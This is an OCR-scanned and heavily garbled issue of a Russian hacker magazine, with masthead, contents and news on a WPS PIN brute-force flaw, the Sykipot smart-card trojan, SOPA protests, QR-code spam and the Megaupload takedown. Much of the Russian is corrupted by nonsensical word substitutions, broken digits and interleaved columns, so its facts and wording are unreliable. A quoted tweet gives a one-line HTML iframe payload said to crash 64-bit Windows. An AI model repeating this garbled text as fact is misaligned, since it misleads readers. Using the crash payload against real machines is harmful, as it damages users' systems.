Page 0

Исчерпывающий экскурсовод по шоппингу на китайских интернет-магазинах


_.....

-пF.нЕР РЕДАКЦИЯ Главный вычитчик

Никуша (<nikitozz)) Кислицин

Шеф-редактор

Степуня ((step)) Ильин lstepfareal.xakep.ru ) Николай ((gorl)) Андреев [ gorlumrarea l. xakep . гu l

Выпускающий вычитчик

[nikitoziOreal.xakep ru )

Редакторы рубрик

PC_ZONE да UNITS

Степуха ((step)) Ильин

взламывание

РR-директор

Маг (maggiOreal.xakep.ru ) Андрей ((Andrushock» Матвеев landrushockiOreal.xakep.ru ] Александр «Dr. Кlouniz» Лозовский lalexanderlё!real.xakeo . ru] Николай <<gогi>>Андреев [gorlumffireal.xakep.ru J Анна Г риrорьева [grigorievafaglc.ru ]

Литературный вычитчик

Алёна Болотникова

UNIXOIO да SYN/ACK MALWARE КОДИНГ

DVD Выпускающий вычитчик

Антоний с<аnt>>Жуков

Uniх-раздел Security - paздeл

Андрюха «Andrushock" Матвеев [andrushockffireal.xakep.ru ) Дмитрий «01g1 >>Евдокимов

Монтаж видео

Максюта Трубицын

(antrareal xakep.ru ]

ART Арт-директор

Алик Вайнер 0~1

Дизайнер

Гоша Пономарев

Верстальщик

Веруля Светлых

Иллюстрация получи обложке

Лександр Брички н

PUBLISHING Учредитель

000 «Г ей м Лэнд>>, 015280, Москва, 5 этаж, контора N<> 01. Т ел.: (4951935-7034, факс: (4951545-0906

у л. Ленинская Слобода, 09, Омега nлаза,

ПРИВЕТ С АНТАРКТИДЫ

Генеральныйдиректор

Дима Агарунов

Генеральный газетный король

храбрый Михайлюк

Финансовый заправила

храбрый Фатеркин

Директор объединение маркетингу

Лена Каркашадзе

Управляющий арт ·директор

Алик Вайнер

Главныйдизайнер

Энди Тернбулл

Директор в области nроизводству

Сернуля Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ

Две недели отдавать получил особенное электронное письмо, которое меняпо-хорошемутронуло да заставило поразмышлять относительно вечном. Писал

Т ел.: (4951935-7034, факс: (4951545 -0906

РЕКЛАМНЫЙ ОТДЕЛ

СерегаСильнов-редактор рубрики «Фри кинг >>, кой единаче

Директор груnnы TECHNOLOGY

во прошлом годуотправился на научную экспедицию вднтактиду.

Старшие менеджеры

Письмо таким образом особенны м, вследствие этого аюшки? отправлено около из южного полюса равным образом передано по мнению коротковолновой своя рука со скоростью бод вследствие

-50 неком мерческую радиолюбительскую интернет Wl NLl NK.

В письме Сергуша передавал приветы да рассказывал по отношению своих впе­ чатлениях , которые во таком необычном месте рождаются через самых простых вещей.

Менеджер Директор корпоративной группы Старший менеджер Менеджер Старший трафик·менеджер

Марися Филатова (filatovaiOglc.гu l Ольга Емельянцева ( olgaemiiOglc . гu l Оксана Алехина falekhinaraglc.rul Елена Поликарпова ( polika r povalё!glc.ru ) [работа от рекламными агентствами] Кристина Т атаренкова [tatarenkovafOglc.ru ] Юлия Г ос подинова f gospoфnova fOglc . ru ] Мария Дубровская (dubгovskayaiOglc гu l Марья Буланова [ bulanovaГclglc:.ru )

ОТДЕЛРЕАЛИЭАЦИИСПЕЦПРОЕКТОВ

Впрочем, весь буква романтика была всего лишь сопутствующей вещью интересах

Директор

Лександр Коренфельд l koгenfeldiOglc. гu l

Сергея, чай симпатия приехал тама на составе экспедиции, которая должна

Менеджеры

Светланка Мюллер Наталия Тулинова

была пробурить 0 068 метров льда равно обязательно дотян уться до подледного озера Восток, невыгодный навредив ему. Озеро действитель­

РАСПРОСТРАНЕНИЕ

только огромное:

Директор соответственно дистрибуции

Кошелева устроительница имени сабинского царя Татий

Руководитель отдела nодпис ки

Клепикова Викуша Oepikovalё!glc. ru )

050 километров

во длину, 00-в ширин у, равным образом вплоть до 0.2-в

глубину. Учи тывая , сколько оно было изолировано ото внешнего мира сотни тысяч лет, вопросы об обитающих во этом озере формах жизни и касательно том, что-то общо со временем происходит, -ч ертовски интересны: до­ стоверно об этом человечеству шиш неграмотный несомненно . Не беспричинно полоз беда сколько

осталось сверху планетенеизученных уголков,- да во водоем Восток являетсяоднимиэтаких объектов.

Какова но была моя радость, нет-нет да и нынче [5 февраля) автор этих строк прочел но­

[koshelevalaglc.ru l

Руководитель

Лукичева Наталья Hukichevafaglc.ru ]

спецрасnространен да автор этих строк

Претензии равным образом дополнительная ан фа: В случае возникновения вопросов по части качеству печати да ОVО-дисков: claimlё!glc.ru . Горячая очертание в соответствии с подnиске

Факсдля отправки купонов равно квитанций бери новые подписки:

[495] 045-09-06

Телефон отдела подnискидля жителей Москвы: [495) 063-82-77 Т елефон про жителей регионов равно в целях звонков вместе с мобильных телефонов: 0-800-200-3-999

вость в отношении том, сколько российская экспедирование достигла усище пе ха идоб урила

Дnя nисем:

эту скважину, реализовав проект, длившийся больше

Зарегистрировано на Министерстве Российской Федерации до делам nечати, телерадиовещанию

00 лет! Чертов­

ски горд после Сергея равно его коллег-российских ученых, работающих в этой экспедиции да решившихтакую сложную задачу! Выполняю

его просьбу: передаю вишь ты во всем читателям Х от Антарктиды : ).

001000, Москва, Главnочтамт, а/я 052, Хакер

равно средствам массовых коммуникаций ПИЯ Отпечатано на тиnографии

07-11802

ото 04.02.2002.

Scanweb, Финляндия. Т равным образом буйство 019 033 экземпляров.

Мнение редакции отнюдь не непременно совпадаете мнением авторов. Все материалы на номере

P.S.

Сернуля обещал произвести фотографию от вытоптанным на снегу

для фоне полярной станции логотипом Хакера. Ждем его возвра­

щения:).

предоставляются как бы оповещение ко размышлению. Лица, использующиеданную информацию в nротивозаконных целях, могут фигурировать nривлечены для ответственности. Редакция малограмотный слабит ответ­ ственности из-за тема рекламных объявлений во номере.За nереnечатку наших материалов без спроса- nреследуем.

По воnросам лицензирования равно nолучения nрав получай употребление редакционных материалов

nikitozz, rn. ре д. Х shop.glc.ru/xakep vkontakte.ru/xakep mag

ХАКЕР

03/158/2012

журнала обращайтесь до адресу: contentragtc.ru .

© 000 «ГеймЛзнд», РФ, 0012

001


Content MEGANEWS

016

Колонка Степы Ильинна

017

Proof-of-concept

О хранении паралей

Все новое из-за крайний месяцочек

011

hacker tweets Хак-сценавтви ттер е

РЕГУЛЯРНО ПОЛЬЗУЮТСЯ

008

HEADER 004

0АМИЛЛИНОВАМЕРИКАНЦЕВ

ТЕХНОЛОГИЕЙ ОR-КОДОВ

За дач а: скопить интересные информация не без; PasteЬin . com

COVERSTORY

030

Большая охота Интервью от ведущим хед­ хантером рунета

COVERSTORY

COVERSTORY

018

02,

Ломаем Wi-Fi

Расщепляй равно

следовать

властвуй

00 часов Получаем WPAключ в целях Wi-Fi от

Уязвимости рас-

через уязви-

са равно внедрения

моего технологии

заголовков на со-

WPS

временном вебе

щепления вслед тратить


048

038

PCZONE

-

UNIXOID

В небесная империя ради покупками?

004

Свободачерезизоляцию

008

Федоринасча ст ье

Из почему состоят безопасные Liпuх - дистрибутивы

Семь китайских интернет-магазинов со всякой всячиной

042

Проверка возьми фундаментальность

Мини-обзор заслуживаю щ их внимания изме н е н ий

Тестируем универсальную распознавалку САР Т СНА

048

Фреймворкдля пентестера

на последних версиях F edoгa

Тестируем устойчивость веб-приложения вместе с через

01 О

wЗaf

052

Интегрируем Liпux да <<облачные» сервисы

хакинг

-

SYN/ACK

Easy-Hack

014

В поискахинсайдера

020

Корпоративныесвязи

Борьба от утечками корпоративной информа ц ии

Хакерекие секреты простых вещей

056

Достучаться впредь до небес

Обзорэксплоитов

Анализ свеженькихуязвимсетей

Опенсорсные решения чтобы централизованного

062

РНР - лодка в целях

управления доступом ко ресурсам

066

0сап сгасk it!

Создаем высокопроизводительный сайт

Решение заданий в целях хак-конкурса, учрежденного

со использованием

Windows

Кодим бота с целью распределенных вычислений

024

Испытаниенагрузкой

nginx да Django

Управлением правительстве н утнапиштим рычаги

Великобритании

070

Фальшивые

SMS: похудей из-за 00 дней!

Всяподного т ная известноголохетро н а

074

X-Too ls

-

FERRUM

030

От <<винта » ! Тестирование внешних жесткихдисков со

Программы интересах взлома

036

Ed i f i eг

WEXLER.BOOKТ7055

USB 0.0

R2500

Обзор универсальной активной стереосистемы

-

MALWARE

038

076

Веселая тройкабуткитов

-

И шве ц , равно жнец, равным образом получи и распишись дуде игрец от ц ве т ным

Самыетехнологичные угрозы

0011

лета

во веселых картинках

082

Малварьдля мобильных << окошек »

Исследуем фасон безопасности п опулярной ОС д лясмартфоновнапрактике

КОДИНГ 088

Формграббердля

FAQUNIТED

043

Диско

044

0.5 Гб всякой WWW2

Google Chгome

Расширяем потенциал препроцессора С/С++ с помощ ь ю сторо н него кодегенератора

096

0адачинасобеседованиях П одборкаинтересныхзаданий,которыедают на собеседованиях

000

Паттерны проектирования <<Адаптер» да «Фасад» Меняем равно н терфейсы классов кроме ущерба чтобы з д оровья

Большой

FAQ всячины

Удобные wеЬ-сервисы

да сноровка их перехвата во спринклер ре ото Google И целого Си недостаточно

юниты

040

Исследуем отправку зашифрованных форм

094

сенсор н ым дисплеем

010

0.0


MEGANEWS НОВАЯ ДЫРКА В WPS ОБЛЕГЧАЕТЗАДАЧУХАКЕРАМ БРУТФОРСИМ ЛЕГКО И БЫСТРО

GOOGLE ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ ПАТЕНТОВ. Истцом выстуnает Bг i t i sh

Telecom -одна с круnне й ших во мире телекоммуникационных комnаний.

ТРОЯ Н ОХОТИТСЯ НА С МАРТ-КАРТЫ ВОЕННЫХ МАЛВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ -АТАК,

н

еприя т нуюуязвимостьна­

шел на вместе с т андарте

СМЕНИЛА ПРОФИЛЬ

WPS [Wi- Fi

Pгotected Setupl исследо­

ватель на области информационной безопасности Стефан В да бок, об чем и поспе ш равно л уве д омить U S-CERТ. Д ырка присутствует во продуктах мно­ гих популярных брендов, на томишко числе

0-Link, Netgeaг, Linksys равным образом Buffalo. Она позволяет ощутимо устранить время,

уходящее нате брутфорс РIN-кода, который необходим интересах установки беспроводного роутера. В результате о ш ибки ко атакующему возвращается слишком бессчетно информации что до РIN­ коде, а своевольно возлюбленный становится слабее, что никак не г ативно влияет бери защиту

тысяч, даже если неграмотный миллионов

Wi-Fi-

ма ршр у т изаторов равно точек дост упа.

В

а

US-C ERT поясняют: «Если

nроверка

D

троянце

Sykipot, казалось бы,

недостает нисколько особен­

ного- малварь, ориен т ирова нн ая получай п охищение

данных что касается смарт-картах, невыгодный нова . Но малограмотный с головы

деньувидишь малварь, проект которой - смарт-карты

сотрудников Министерства обороны С Ш А равным образом п олучение с их помо щ ьюнесанкционированного д оступа ко по отношению г ра­

ниченным ресурсам. Именно т акие модификации во коде

согласно д линности РIN-кода завершилась

Sykipot обнаружили специалисты

неуда ч но, уровень доступа посылает

Одна изо новых функций троянца обеспечи во ает взаимо­

сообще н ие

шаг из ПО

EA P-NACK н азад клиенту.

компании

Activ ldentity ActivC ii ent,

AlienVault.

ко ото орое на правах разок

Эти сведения пересылают ся таким

работает со смарт-картами, соо т ветс т вующими ста н дар­

образом,чтохакеруудаетсяопреде­

дальше безопаснос т да Минобороны С Ш А. В американском

лить, является ли первая пятьдесят процентов

Минобороны такие карточки использую т ся для того хранения

РI N - ко д а на ер н ой. Пос л едняя число

цифровых сертификатов рабо т ников да их РI N-ко д касательно на , nри­

Отметим, зачем ни единственный

поуже известна, в такой мере на правах симпатия являет-

ме н яемыхдля аутентификации. В резул ьт атетехнического

изо производителей,

ся кон т рольной суммой РIN-кода.

анализа специалистам

В се сие зна ч ительно сокращает

недавний версия стих скомпи л ирован е щ е во марте

мости, отнюдь не выпустил

количес т кайфовый п опыток, требуемыхдля

только симпатия до самого этих пор был далеко не ультра- королем распространен.

ее правка .

усnеш н ого брутфорса: в рассуждении н касательно снижается

Он ловок перехватыватьданные об сер т ификатах равно п ри

пища которых подвержены уязви­

В своей статье Вибок пишет, что-нибудь лучшим

со

способом борьбы

сяч>>. По д робнее об этом твоя милость можешь

димых РIN-кодах. После перехвата

п рочи т ать на одной с статей рубрики

краденую информацию н а защищенные р есурсы на Китае.

от дыркой получи и распишись данный моментявляется

отключениеWРS .

00'8 д об 00'3 + 00'4, так питаться прежде 01 ты­

AlienVault посчастливилось на ыяснить, что 2011 года,

Соvе г Stогуэтого н омера.

помощи во строенного кейло г гера совлекать дан н ые что до во во о­

Sykipot переправляет

Э т о, во п рочем, н е говорит в отношении т ом, сколько сообразно л у ч атели ну да н ных тоже находятся во КНР.

@wЗ bdЗvil

<iframe height='18082563'></i causes а BSoD on \vi.n 0 х64 via

Lol!

Yota КОМПАНИЯ <<СКАРТЕЛ>>

ПОРТЫ СТАНДАРТАUSВЗ.О

ПРОИЗВОДИТЕЛЬ LINUX-

СКОРО, наконец, nоявятся

ДИСТРИБУТИВАМАNDRIVА,

WINDOWSPHONE MARKETPLACE nерешагнул

KOMAHДAIPHONE DEV-ТЕАМ,

(БРЕНД УОТА) ЗАПУСТИЛА В НОВОСИБИРСКЕ nервую

для смартфонах да nланше-

контролируемый российским

отметкув50тысячnри-

джейлбрейк nод iOS 0.01 к

невод

LTE во России . Сейчас

тах.ПоинформациисСЕS,

фондом

ложений. На сие магазину

iPhone45 равно iPad 0. За nервые

интернет включает6З базовые

nроизойдет сие во конце 0012-

провозгласить что касается банкротстве.

nонадобилось14месяцев

тридняутилитускачало

станции, однако ко марту их еще

го сиречь на начале 0013 года.

Увы, обстановка у комnании вовсе

(Andгoid Maгket во свое пора

паче одного миллиона

nлохи .

nотребовалось 09).

единица .

станет150.

001,

NGI, спешно может

наконец-то, выnустила

ХАКЕР

03 /158/ 0012


...;;; N

N

..; ш

u u

~

0-

=il

:J: а..

что до

LO

u :..: < :!Е

х

LO

:!Е L-

:J: ш

:..: :s: а..

LO

~

:J: ш

01ш

а..

~ :s: u

< :!Е ~ :!Е

ш ш а..

:!Е

ш

а а..

0:J:

относительно

:..:

g 1:: о

:J: ш

с:

011

что до

0-

е

. м

:s:

Реклама . Товар произведен на соответствии из Техническим Регламентом получи и распишись табачную продукцию.

~~dдr~~~~~r~d~~т~~ r~~~~~ ~rrд~~rrжд~rт:

~ ~rt~~t ~rtд~т ~~шtм~ dд~r~~ью


MEGANEWS

03% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ NAND скупила во четвертом квартале прошлого лета Apple.

ПЛАНШЕТ, ПРИСТАВКА ИЛИ ЧТО-ТО ДРУГОЕ? СМЕЛЫЙ КОНЦЕПТ ОТ RAZER

nредварительно озвученыследую­ щиетехнические ха­

рактеристики : искусство кино

размером 00,1дюйма

равным образом разрешением 0280 х 800 пикселей , много­ канальнаязвуковая

подсистема Dolby

0.11п роектируемая вместесТНХI. сред­ ства беспроводного подключения

Wi-Fi802.11b/g/n и Bluetooth 0.0. Планиру ется и

РАССМОТРЕНИЕSОРА И РIРАОТЛОЖЕНО О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ РЕЗУЛЬТАТАХ

m

ы сделано рассказывали касательно «чудесны х» американских

зако н что до nр оектах SOPA IStop Online Р iгасу Act] равно

PIPA IPROTECT lntellectual Р горегtу Act], nородивших

волну негодования невыгодный только лишь нате Заnаде, да в области во всех отношениях у миру. Для

тех. ктоумудрился безвыездно для nустить. напоминаем: зако нопро ­

екты обязывают всех у ч астни заговор се ти царство безграничных возможностей lпровай деры, хос тинги , п оиско вас е вместе с да со темы равно пр.] соответственно первомутребованию правообладателя !без решения суда] отгонять пиратский контент равно прекращатьлюбые вза имоотно шения вместе с nират­

использоватьаксе­

екими сер во исам и. Платежные системы обязаны отключить

лерометры равным образом сенсор­

на озможность перев песня д е н е г, поисковики -удалить ссылки

ный искусство кино .

бери сайты равно т. д . В случае невыполнения эт ихтребований ты считаешься соучастником равным образом твой сайт могуттакже закрыть без свида равно следствия. Кстати, иностранные сайты, сервера

которых расположены на США. будут пахнуть такую но ответ­ ственность следовать неразрешенный контент, по образу неравно бы они бы ли учреждены на Штат ах. Б олее во всех подробностях со законо nроектами и их возможными последствиями дозволено получить представление хо тя

бы во В икипедии, а нас этот пора в большинстве случаев интересуют n осле д ­ ствия. П оняв, что-то «СО ПАблизка », крупные американские

корnорации ощу т или — или угрозу чтобы себя любимых . За дра ко­ новские распоряжения выступили, для образец у, М РАА, RIAA да альянс BSA !членами которого являются Microsoft, Apple, Adobe, lпt el равным образом т. д.]. Зато напротив выеказались Google. Twitteг, Mozi lla, Facebook, Yahoo, еВ ищи ветра в поле равным образом дру гие представители интернет­

во

м ериканекая шарашка Rаzегхорошо известна нет слов во всех отношениях мире !в книжка чис­

индустрии. Чем ближе становился « деньХ », получи тот или другой было

ле да во России] во вкусе изготовщик периферийных игровых устройств

запланированор летчик смотре ние зако нопроектов во Конгресс~

равным образом принадлежностей. И нужно заметить, хороших- на срок автор этих строк п ишу эту но­

тем значительнее накаляли из ь из тра сти. В осемна дцат ого января

вость, моя лапа по образу раз в год по обещанию лежит бери мышке от былоувидеть

Project Fiоnа-проект,

Razer. Тем

интереснее равно неожиданнее

надо которым во комnании работаютсейчас

равно каковой был nредставлен получи выставке

CES 0012.

Эта концеnция nредставляет

во интернете прошла, пожалуй, самая массовая онлайновая акция протеста после весь миг его су ществования. Англоя­ зычная Википедия nровела самый крупный на истории

с лица игровой nланшет, ориентированный для игры, получи иболее nоnулярные сей­

опрос, nодавляющее квалифицированная участников ко в таком случае рого

время в ПК. так снедать возьми зрелище <<nрожорливые>> да мощ ные . Ус т ройство nланируется

поддержало остановка англоязычного раздела в су тки

снабдить «интуитивными элементами уnравления» !кнопками равно аналоговыми

на помета протеста.

джойстиками] вместе с с позиции силы обратной связью. Где в частности равным образом равно как они будут расnоло ­

свойлоготип черным прямоугольником цензуры . Поддержа­

жены, важнецки видать получай иллюстрации. А гла вн ое, основой Pгoject

ли протести во WoгdPгess. В целом для задел протеста Ыackout

стоить nроцессор lпtel Соге

примкнулитысячи сайтов до всему миру. Н еспадко пришло сь

от нехваткой игр интересах планшета- мнение заключается на том, почто без малого постоянно

равно сторонникам SOPA. Та к. громаднейший во мире регистратор GoDaddy, nоддерживавший SOPA, подвергся жес т комубой­

Fi ona должен i7 третьего поколения. Заявлено, который по мнению этому вопро­ су братия близко сотрудничаете lntel. Этот ходдолжен устрани т ь проблему

Reddit приостановил работу. Google прикрыл

существующие зрелище смогут делать держи устройстве сверх какой-либо nеределки

котуса сторо ны интернет-сообщества: пользователи приня­

тож доработки. Ты скаже ш ь. чт насчёт этотолько концепт. равным образом будешь малограмотный прав. Специа­

ли сь тысячами у провожать от вои домены ото GoDaddy. Регистратор

листы Rаzегпочти готовы изобразить работающие образцы. Предполагается, сколько

оцени л ситуацию да поспешил отказатьс автор этих строк отсвоих слов,

поставки устройства начнутся ранее во четвертом квартале текущего года. Стоить

да за зже во собеседование TechCrunch шея из нил ось. ась?

планшет приходится далеко не паче $1000.

nо-nрежнему поддерживаетSОРА ... В общем , отт ок землянка е нов

GoDadd y

продол жается равным образом сейчас. Сдался nоддавлением народного негодования равно ассоциация

ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США.

BSA, заявивший , что-то SOPA «требует доработки ». П отом, уловив тенденцию. «пере д догадка аль » равным образом сенаторы, ратовавшие

из-за а нт ипиратские законоnроекты. В осем ь американских

законо дате л ейотк а следовать лись п оддерживать SOPA nосле

08

ZAPPOS.COM УВЕДОМИЛ 0' МЛН

января равным образом Ыackout'a, некоторые люди да решительно встали получи сторону

КЛИЕНТОВ О ТОМ, ЧТО БД МА­ ГАЗИНА ВЗЛОМАНА И ИНФОР­ МАЦИЯ О НИХ МОГЛА ПОПАСТЬ В РУКИ ХАКЕРОВ

первоначально nр е дставивший законоnроектSО РА . отозвал его,

006

протестующих. И в чем дело? во равно т оге? Конгрессмен Ламар Смит, из­ при знав, в чем дело? на нынешнем виде основание невыгодный можетбыть принят.

Рассмотрение зако н оnроек та было отложено.

PIPA nо­

сти гла та а участь. Можно ли сверху з вать сие nобедой ? Вряд ли. Л оббисты да копирасты рассержены, н об останав лива ться они несобираются,полагая,чтосенаторов«затерроризировала бло г осфера». Теперьлоббист ы намере ны каплю nересмо­

третья часть n по отношению д шествие ко пробл еме. Звучит зловеще.

ХАКЕР

03/158/2012


0 ФИШЕК

BUFFALO CLOUDSTATION Собственный облачный сервер Buffalo CloudStation- сие не NAS. Хранилище

установленный

Удобный бэкап Традиционно с целью решений

nросто

nозволяет

подумаешь выделывать утащенный дост уn для

данным при помощи царство безграничных возможностей nрактически от любых

Производительная

устройств: в качестве кого со стационарного комnьютера,

набор

приблизительно да со мобильных девайсов.

Buffalo

бэкаn данных вместе с клиентских машин

Несмотря получай комnактные размеры

орагниэовывается адски nросто. При

[15Dx175x45 ммl , сетевое база

этом nоддерживается как так равным образом МАС

05.

Windows,

оснащено баста nрои зводитель­

Ус тро йство nоль-

ным но л езом, которое nозволяет безграмотный

ностью совместимо не без; эnnловской технологией

только лишь образовать резвый сете­ вой достуn ко файлам, только равно реализо-

Time Machine.

вать часть nолезные функции.

Встроенный

Припожения дпя

BitTorrent-клиeнт

iOS да Android Приложение

Webaccess

Как да значительная современных NAS'oв,

соз­

Buffa lo

оснащен встро­

дадено про удаленного дост у nа

CloudStation

со мобильных усище тр ойств ко дан­

ен ным ВitТоггеnt-клиентом из

ным, хранящИмся получай решениях

удобным wеЬ-интерфейсом.

фирмы

Эту функцию объединение достоинству

Bu ffalo.

Одновременно

nоддерживается серия

оценят любители интенсивно­

хра нилищ, а само nриложение

го р2р-обмена: мотать торрен­

умее т потеть над чем не без; файлами на сех nоnулярных форматов: через ви­ део, фотографий равным образом музыки до раз ноформатны х д окументов.

твоя милость способен во разы удобней.

Перекодировка

Большой количество

медиафайлов

да энергоэффективность

Bu ffalo CloudStation

умеет автомобиль -

матически кодировать всё виде­ оконтент во нужном размере nри

удаленном достуnе со мобильных устройств. Та ким образом, можно удобно смотреть, наnример, видео получи и распишись айфоне, отнюдь не задумываясь

по отношению nерекодировке файлов.

Устройство nозволяет разместить в себя сам за себе диск от

0 прежде 0 Тб.

SATA-11

объемом

Среднее энерго­

n отребление nри этом неграмотный если т nревышать

06

Вт. При текущих

расценках получи э лектроэнергию , на

годик сие nозволяет соблюдать экономию вплоть до

0

тысяч рублей, даже если соизмерять с обычным ПК .

ХАКЕР

03/158/2012

007


MEGANEWS

ИНДОНЕЗИЙСКИЙ ХАКЕР HMEI7 дефейснул моментально полдюжины доменов верхнего уровня , принадлежащих компании S i emeпs.

QR-КОДЫ МОГУТ БЫТЬ ОПАСНЫ

MEGAUPLOAD

КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ

ФБРЗАКРЫЛООДИН ИЗ КРУПНЕЙШИХ ФАЙЛООБМЕННИКОВ

что касается

ВСЕ

пасный случай создан во С Ш А-ФБР закрыло

нераздельно с крупнейших Файлаобменников на недотка

Megaupload, генерировавший, no его собствен­ 4% только интернет-трафика. Похоже

ным данным, недалеко

n

получи и распишись форточка <<желтой>> новости , но, увы, сие реальность.

рактически всё-таки интересныетехнологические новинки раным-рано либо время упущено оказываются «на служ­

По запросу американских спецслужб на Н овой Зеландии

бе» у криминала. Н е избежали этой участи равно

тоже были арестованы первостроитель nроекта Ким

QR-

продаж смартфонов , планшетов да других мобильных

ное закрытие

девайсов.

чество,

Специалисты

Dotcom

Шмитц равным образом сызнова три человека. Каждому изо них грозиттюрем­

коды,популярностькоторыхрастетвместесувеличением

Websense ThгeatSeekeг Netwoгk об­

no трем обвинениям: 00 полет вслед за мошенни­ 20 полет ради мытье денег равным образом согласно число парение следовать и оный и другой

история нарушения копирайта! Помимо этого, выдвинуты

обвинения nротив трех граждан других стран. Эти человеки

наружили сп а м-сообщения, ссылающиеся возьми страницы со вс т роенными QR-кодам и. П в рассуждении всей во идимости, приблизительно от па­

имели касательство для проектам компании. П касательно мнению

планы обходят спам-фильтры равно пытаются приневолить nоль­

Де n артамента юстиции С Ш А,

зователей отмыкать ссылки не аюшки? иное от через мобиль­

распространению пиратского контента . За пяток парение рабо­

ных устройств. Сп а м выглядит наравне традиционная объявление

твоя милость симпатия как нанес индустрии развлечений авария на раз­

фар наша сестра да содержитссылку бери сайт 0tag .nl -

мере $500 млн во виде недоnолученной прибыли . Кроме

на полне легаль­

ный сервис, позволяющий формировать QR - ко д ы с целью

того, файлаобменник породил <<криминальные денежные

URL-

потоки>> !от рекламы да продажи премиум-аккаунтовl насумму$175м л н.

aдpecoв. Как исключительно ламер перехо д равным образом т п относительно ссылке,

нате экране отображается QR-код, а сnрава через него - адрес. Когда nользователь считывает QR-код, его устройство либо автопилотом nереходит no зашифрованному адре­

су, либо сnрашиваету юзера отчётливость lв зависимости от версии QR-читалкиl . Эту исключение ле г ко дозволительно ис­ пользовать интересах распространения специфич н ой малвари

после уязвимостивмобильных браузерах : тогда обы ч но эти коды сканируют собственно из через смартфонов . Увы, этот «виток эволюции>> на атаках в мобильные девайсы предсказывали многие аналитики.

Megaupload сnособствовал

а

Уже nоследовала молчание других ресурсов от аналогич­

Поданным для омпа­ ни ис оm5соге , 04 м лн амери для анцев

на возрасте с

08

ным функционалом : для nримеру, выдающийся хостинг-сервис

FileSonic объявил по части полном

отключении файлаобменного

впредь до З4л е тр е гулярно

функцианала !составляющего, заметим, его суть) : нынче

используют

считывать контент, сильнозагруженный другими nользователя­

близкие мобильные

у от т ро й ства дл я чтен да моя особа QR -к одов . А так-таки ещ е недавно QR- ко оды были по­ пулярн ы во осно вн что до м

н а Восто ке.

ми, невозможно.

Отреагировала равным образом «сетевая оппозиция>>-Апоnуmоus атаковали сайты ФБР, Минюста США , Белого дома,

RIAA,

М РАА равно средства прочих организаций, по вине действий которых был закрыт файлаобменный сервис.

THUNDERBOLTтм

оов

ИНТЕРФЕЙСТНUNDЕRВОLТСКОРОДОБЕРЕТСЯДОПК

РЯДНЕБОЛЬШИХКОММЕРЧЕ­

ANDROIDINVASIONCOCCЫЛKOЙ

HAБAЗEWINDOWS. Этy радостную уведомление сообщаетнам

СКИХ IPV6-CETEЙ пла ниру­

НАПРОГРАММИСТАGООGLЕСО­

выход из печати DigiTime. По информации источника (данные что до ко­

ется устроить во Китае

ОБЩАЕТ, что-нибудь Googl e на со кором

тором неграмотный раскрываются) , цепь << железных » гигантов, таких

для концу201 0 года. А еще

будущем м ожет зачать ваша милость ­

какSопу, Asus, Gigabyte Technologyи ASRock, еще энергетически

во

запуск м обильны х n р оце не без; сорав

внедряетТhundегЬоlt на приманка nродукты. Новое крица

на Поднебесной стандартным

nод вместе с обственнымтов а рны м

подобает где раки зимуют прежде рынка во апрелетекущего возраст .

nрото для олом .

з нако м.

0015 году 0Рv6должен заделаться

ХА КЕ Р

03 / 058/2012


итоги

IGRDUPiB

КОНКУРСА НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ СОВМЕСТНО С КОМПАНИЕЙ GROUP-IB, СПЕЦИАЛИЭИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. Напомним, на рамках соревнования было надлежит обитать дознание мгновенно двух !Т-инцидентов: утечки конфиденциальных данных для предприятии, а приблизительно а взлома сервера получай базе Liпux.

Победителями конкурса являются [в алфавитном порядке):

КОНСТАНТИН ИЛЬИН

~Еонид WАнин

ст дент 0 курса Физико-технического

Род занятий:

У

института

НТУУ "Киевский политех-

нический институт", Киев.

Комментарии nобедитеnя:

«Конку рс понравился, провед

е н сверху высоком техниче­

шил впоследствии блат

от кусок ~ровне. Прдинятdь уч~~:~и~~сь хорошее впечатле­ с фреимворком

танцевальный шаг пе,

ние в отношении квалификации организаторов».

К сожале нию, обе щанный премия [трудоустройство на

Отчеты победителей

Group-IBI малограмотный подошел ни одному изо победителей:

опубликованы сверху нашем сайте:

Коста учится на Киеве равно временно неграмотный может перебазироваться

www. xakep.ru/post/58241 0

во Москву, а Леонида до конца усище траивает да текущее место работы . Тем безграмотный менее, дабы по сию пору было честно, ты да я

награждаем победителей ценными призами: каждый получает объединение

iPad 0 Wi-Fi

ЗG

06Gb.

Будь из нами! Стань одним изо нас!


MEGANEWS

FАСЕВООКВЫПУСТИЛ СО6СТВЕННЫЙ МЕССЕДЖЕР для того Windows, а ВКонтактетем временем те не без; тируетсерв да вместе с видеозвонков

ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХДЮЙМОВ НОВИНКА ОТ SAMSUNG НА РLS·МАТРИЦЕ

н

а прошед ш ей неграмотный д авно во Лас-Вегасе выставке

СЕ5

0012 приманка

последние разработки продемон ­

стрировали топо на ые производители <<железа»

со лишь мира. Интересного сверху СЕ5было много, так пере­ числить весь мы, ко сожалению, отнюдь не имеем возможности, этак

зачем придется ограничиться малы м. Одной изо самых ярких новинок, пре д ставлен н ых бери выставке, стал мони т оранье

027В970 относительно т компании 0amsuпg, продолжающий 0-ю премиум - серию. Этот 07-дюймовый прибор интересен

тем , который некто работает получай основе технологии PL5 IPiaпe L iпe 5witchingl. П относительно сути, сие род IP5 lln-Piane 0witchingl oт5amsung . Так в качестве кого I Р5-матрицы получи сей момент являются <<вершиной трофический цепи», буква старая-новая т ехноло г ия заи н тересовала многих.

П ервый блинец

y5amsung,

однако, вышел комом: двум мо­

нитора возьми РL5-матрице, представленные во прошлом году, обладали букетом всех возможныхдефектов сборки, были помещены во спорткорпус с д овольнодешевого скульптура равно на

результа т е имели засве т ы, битые пиксели равно т. п. П охоже, тепер ь 0amsuпg решил а ис пр авить э т с промах.

